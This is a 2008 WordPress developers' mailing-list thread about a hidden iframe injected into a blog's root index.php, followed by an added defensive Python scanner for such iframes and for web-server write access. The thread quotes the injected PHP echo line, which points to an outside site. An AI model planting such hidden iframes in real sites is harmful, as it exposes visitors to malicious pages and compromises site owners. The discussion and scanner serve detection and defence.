[wp-hackers] XSS vuln in wordpress 2.7 ?
wp-hackers at striderweb.com
Mon Dec 22 18:36:07 GMT 2008
Well, wait. He said: "i found [it in] my blog's index.php (not
Does this mean it shows up in the final rendered page, but not in the
theme's file? In that case, it's being added dynamically. The link
is not written in the theme.
Just trying to clarify. I'm no security guru... (IANASG)
On Dec 22, 2008, at 11:33 AM, Joost de Valk wrote:
> If the file is writable for the webserver and file access is enabled
> on the webserver: yes.
> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>> Wow. That's nasty, and malicious. Could a plugin do that?
>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>> For some reason I found my blog's index.php (not theme's index.php)
>>> with the following piece of code right before the ?>
>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>> I tried looking at the logs. No luck. The file's permissions look
>>> like this:
>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50 /home/madalin/www/
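An added example, not part of the original thread: a defender-side check for the two questions raised above, namely whether any PHP file carries a hidden 1x1 iframe like the one reported, and whether the web server account could have written it. The sample file, the `example.invalid` URL, the function names and the uid/gid values passed in are assumptions made for illustration.

```python
import os
import re
import stat

# Constructed sample modelled on the report; example.invalid is a placeholder.
SAMPLE = '''<?php
require('./wp-blog-header.php');
echo "<iframe src=\\"http://example.invalid/?click=0\\" width=1
height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";
?>
'''

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)  # [^>]* spans newlines
# 0/1-pixel dimensions or CSS hiding; quotes may be backslash-escaped in PHP.
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*\\?["']?[01]\b|visibility\s*:\s*hidden|display\s*:\s*none""",
    re.IGNORECASE,
)

def find_hidden_iframes(text):
    """Return (line_number, tag) for every iframe tag that looks hidden."""
    return [
        (text.count("\n", 0, m.start()) + 1, m.group(0))
        for m in IFRAME_RE.finditer(text)
        if HIDDEN_RE.search(m.group(0))
    ]

def webserver_can_write(mode, file_uid, file_gid, web_uid, web_gids):
    """Classic POSIX mode-bit check (ACLs ignored) for the web server account."""
    if web_uid == 0:
        return True
    if web_uid == file_uid:
        return bool(mode & stat.S_IWUSR)
    if file_gid in web_gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)

def scan_tree(root, web_uid, web_gids):
    """Yield (path, hits, writable_by_webserver) for each flagged .php file."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read())
                if hits:
                    st = os.stat(path)
                    yield path, hits, webserver_can_write(
                        st.st_mode, st.st_uid, st.st_gid, web_uid, web_gids)

if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE))
```

With mode `-rw-r--r--` as in the listing above, `webserver_can_write` is true only when PHP runs as the file's owner (or as root), which is the condition to verify on the host.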